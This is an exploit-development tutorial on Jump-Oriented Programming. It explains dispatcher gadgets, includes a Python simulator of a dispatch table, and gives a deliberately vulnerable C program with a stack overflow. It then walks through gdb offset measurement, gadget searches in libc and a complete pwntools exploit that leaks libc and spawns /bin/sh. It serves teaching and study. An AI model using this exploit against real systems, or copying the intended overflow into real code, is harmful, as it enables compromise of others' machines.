JOP(Jump-Oriented Programming)

In a JOP chain the stack-driven `ret` of ROP is replaced by a dispatcher gadget: rdx walks a table of gadget addresses in memory, and every gadget ends with an indirect jump back to the dispatcher. The figure below shows the layout used in this article.

Dispatcher gadget (addr : 0xffff0910), indexed by the value of the rdx register:

add rdx, 8
jmp [rdx]

Register values while the chain runs:
  rdx : 0x1000 (start of the dispatch table)
  rsi : 0xffff0910 (dispatcher address, used by "jmp rsi")
  rdi : 0xffff0910 (used by "jmp [rdi]")

Dispatch table and the JOP gadgets it points to:

  Memory address   Value        Gadget
  0x1008           0xffff0010   mov rax, [rax] ; jmp rsi ;
  0x1010           0xffff0710   add rax, [rbx] ; jmp [rdi] ;
  0x1018           0xffff0410   mov rdi, [rdx] ; jmp rsi ;
  0x1020           0xffff0510   jmp rax
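To make the dispatcher mechanism concrete, the following Python model steps through the dispatcher and table shown above. This is an added example, not code from the original page: the dispatcher address, table slots and gadget semantics are the figure's, while the initial rax/rbx data cells, the memory slot that rdi points at (so that "jmp [rdi]" lands on the dispatcher) and the sample values 5 and 7 are constructed assumptions.

```python
"""Toy simulator of the dispatcher/dispatch-table layout drawn above.

Added example, not code from the original page: it models the dispatcher
(add rdx, 8 ; jmp [rdx]) and the four JOP gadgets of the figure as plain
Python functions over a tiny register file and memory, so the order in which
the dispatcher hands control to each gadget can be traced.
"""

DISPATCHER = 0xffff0910      # dispatcher gadget address from the figure
TABLE_BASE = 0x1000          # rdx starts here; the first slot used is 0x1008


class JopMachine:
    def __init__(self, regs, mem, gadgets):
        self.regs = dict(regs)        # register name -> value
        self.mem = dict(mem)          # 8-byte slot address -> value
        self.gadgets = gadgets        # gadget address -> function(machine) -> next rip
        self.trace = []               # gadget addresses in execution order

    def dispatcher(self):
        # add rdx, 8 ; jmp [rdx]
        self.regs["rdx"] += 8
        return self.mem[self.regs["rdx"]]

    def run(self, max_steps=32):
        rip = DISPATCHER
        for _ in range(max_steps):
            if rip == DISPATCHER:
                rip = self.dispatcher()
                continue
            gadget = self.gadgets.get(rip)
            if gadget is None:        # control left the gadget set: chain is over
                break
            self.trace.append(rip)
            rip = gadget(self)
        return self.trace


# The four gadgets from the figure, each returning the address it jumps to.
def g_mov_rax_mem_rax(m):             # mov rax, [rax] ; jmp rsi
    m.regs["rax"] = m.mem[m.regs["rax"]]
    return m.regs["rsi"]

def g_add_rax_mem_rbx(m):             # add rax, [rbx] ; jmp [rdi]
    m.regs["rax"] += m.mem[m.regs["rbx"]]
    return m.mem[m.regs["rdi"]]

def g_mov_rdi_mem_rdx(m):             # mov rdi, [rdx] ; jmp rsi
    m.regs["rdi"] = m.mem[m.regs["rdx"]]
    return m.regs["rsi"]

def g_jmp_rax(m):                     # jmp rax
    return m.regs["rax"]


GADGETS = {
    0xffff0010: g_mov_rax_mem_rax,
    0xffff0710: g_add_rax_mem_rbx,
    0xffff0410: g_mov_rdi_mem_rdx,
    0xffff0510: g_jmp_rax,
}


def simulate():
    """Run the figure's chain once and return the machine for inspection."""
    # Constructed initial state (assumption, not from the page): rsi holds the
    # dispatcher address for "jmp rsi", rdi points at a slot that holds the
    # dispatcher address so "jmp [rdi]" also returns there, and rax/rbx point
    # at two data cells with sample values 5 and 7.
    regs = {"rdx": TABLE_BASE, "rsi": DISPATCHER, "rdi": 0x2000,
            "rax": 0x3000, "rbx": 0x3008}
    mem = {
        TABLE_BASE + 0x08: 0xffff0010,  # dispatch table, as in the figure
        TABLE_BASE + 0x10: 0xffff0710,
        TABLE_BASE + 0x18: 0xffff0410,
        TABLE_BASE + 0x20: 0xffff0510,
        0x2000: DISPATCHER,             # [rdi] -> dispatcher
        0x3000: 5,                      # [rax] sample data
        0x3008: 7,                      # [rbx] sample data
    }
    m = JopMachine(regs, mem, GADGETS)
    m.run()
    return m


if __name__ == "__main__":
    m = simulate()
    for addr in m.trace:
        print("dispatcher -> gadget %#x" % addr)
    print("rax after the chain: %d" % m.regs["rax"])
```

Running it shows the four gadgets executing in table order, with rax ending at 12 and the chain stopping once "jmp rax" leaves the gadget set. The point to take from the model is that the order of execution is fixed entirely by the contents of the dispatch table and the register pointing into it, never by the stack: a stack canary or a return-address check never sees the chain, whereas a forward-edge control-flow-integrity check on indirect jump targets would reject every "jmp rsi" / "jmp [rdi]" edge it relies on.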

Proof of concept

Example code

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>

void vuln(){
    char buf[50];
    /* Leak the address of printf in libc so the exploit can compute the libc base. */
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    /* Intended bug: reads up to 256 bytes into a 50-byte buffer (stack overflow). */
    read(0, buf, 256);
}

int main(){
    seteuid(getuid());
    write(1,"Hello ROP\n",10);
    vuln();
    return 0;
}

Build & Permission

lazenca0x0@ubuntu:~/Exploit/ROP$ gcc -fno-stack-protector -o jop jop.c -ldl

Overflow

lazenca0x0@ubuntu:~/Exploit/JOP$ gdb -q ./jop
Reading symbols from ./jop...(no debugging symbols found)...done.
gdb-peda$ disassemble vuln 
Dump of assembler code for function vuln:
   0x0000000000400756 <+0>:	push   rbp
   0x0000000000400757 <+1>:	mov    rbp,rsp
   0x000000000040075a <+4>:	sub    rsp,0x40
   0x000000000040075e <+8>:	mov    esi,0x400864
   0x0000000000400763 <+13>:	mov    rdi,0xffffffffffffffff
   0x000000000040076a <+20>:	call   0x400630 <dlsym@plt>
   0x000000000040076f <+25>:	mov    QWORD PTR [rbp-0x8],rax
   0x0000000000400773 <+29>:	mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000400777 <+33>:	mov    rsi,rax
   0x000000000040077a <+36>:	mov    edi,0x40086b
   0x000000000040077f <+41>:	mov    eax,0x0
   0x0000000000400784 <+46>:	call   0x400600 <printf@plt>
   0x0000000000400789 <+51>:	lea    rax,[rbp-0x40]
   0x000000000040078d <+55>:	mov    edx,0x100
   0x0000000000400792 <+60>:	mov    rsi,rax
   0x0000000000400795 <+63>:	mov    edi,0x0
   0x000000000040079a <+68>:	call   0x400610 <read@plt>
   0x000000000040079f <+73>:	nop
   0x00000000004007a0 <+74>:	leave  
   0x00000000004007a1 <+75>:	ret    
End of assembler dump.
gdb-peda$ b *0x0000000000400756
Breakpoint 1 at 0x400756
gdb-peda$ b *0x000000000040079a
Breakpoint 2 at 0x40079a
gdb-peda$
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/JOP/jop 
Hello ROP


Breakpoint 1, 0x0000000000400756 in vuln ()
gdb-peda$ i r rsp
rsp            0x7fffffffe4a8	0x7fffffffe4a8
gdb-peda$ x/gx 0x7fffffffe4a8
0x7fffffffe4a8:	0x00000000004007d0
gdb-peda$ c
Continuing.
Printf() address : 0x7ffff785e800


Breakpoint 2, 0x000000000040079a in vuln ()
gdb-peda$ i r rsi
rsi            0x7fffffffe460	0x7fffffffe460
gdb-peda$ p/d 0x7fffffffe4a8 - 0x7fffffffe460
$1 = 72
gdb-peda$ 

Exploit method

  1. Run "/bin/sh" through the system function

system(binsh)

Stack layout of the payload:

  Address          Value
  0x7fffffffe498   Gadget (POP RAX, ret) address
  0x7fffffffe4a0   System function address in libc
  0x7fffffffe4a8   Gadget (POP RDI, JMP RAX) address
  0x7fffffffe4b0   First argument value

Information needed:
  • the area where the "/bin/sh" string is stored
  • libc offsets
    • printf
    • system
  • gadget locations
    • POP RAX, ret
    • POP RDI, JMP RAX

Find gadget

lazenca0x0@ubuntu:~/Exploit/JOP$ sudo ./rp-lin-x64 -f /lib/x86_64-linux-gnu/libc-2.23.so -r 1|grep "pop rax ; ret"
0x00033544: pop rax ; ret  ;  (1 found)
0x0003a727: pop rax ; ret  ;  (1 found)
0x0003a728: pop rax ; ret  ;  (1 found)
0x0003a7f7: pop rax ; ret  ;  (1 found)
0x0003a7f8: pop rax ; ret  ;  (1 found)
0x0003a8a0: pop rax ; ret  ;  (1 found)
0x0003a8a1: pop rax ; ret  ;  (1 found)
0x000abc07: pop rax ; ret  ;  (1 found)
0x00106272: pop rax ; ret  ;  (1 found)
0x00106273: pop rax ; ret  ;  (1 found)
0x001a1448: pop rax ; ret  ;  (1 found)
0x000caabc: pop rax ; retn 0x002F ;  (1 found)
lazenca0x0@ubuntu:~/Exploit/JOP$
lazenca0x0@ubuntu:~/Exploit/JOP$ sudo ./rp-lin-x64 -f /lib/x86_64-linux-gnu/libc-2.23.so -r 1|grep "pop rdi ; jmp rax"
0x00104052: pop rdi ; jmp rax ;  (1 found)
lazenca0x0@ubuntu:~/Exploit/JOP$

Exploit code

from pwn import *

#context.log_level = 'debug'

#64bit OS - /lib/x86_64-linux-gnu/libc-2.23.so
# Offsets from the libc base (libc-2.23); the gadget offsets come from the "Find gadget" step above.
libcbase_printf_offset = 0x55800
libcbase_system_offset = 0x45390

binsh_offset = 0x18cd57

pop_rax_ret = 0x33544
pop_rdi_jmp_rax = 0x104052

r = process('./jop')

r.recvn(10)                              # "Hello ROP\n"
r.recvuntil(b'Printf() address : ')
libcbase = int(r.recvuntil(b'\n'), 16)   # leaked printf address
libcbase -= libcbase_printf_offset       # libc base = printf address - printf offset

# 72 bytes of padding from buf to the saved return address (see the gdb session above).
payload = b"A"*72
payload += p64(libcbase + pop_rax_ret)              # pop rax ; ret
payload += p64(libcbase + libcbase_system_offset)   # -> rax = system
payload += p64(libcbase + pop_rdi_jmp_rax)          # pop rdi ; jmp rax
payload += p64(libcbase + binsh_offset)             # -> rdi = "/bin/sh", then jmp system

r.send(payload)

r.interactive()

lazenca0x0@ubuntu:~/Exploit/JOP$ python jop.py 
[+] Starting local process './jop': pid 6105
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$
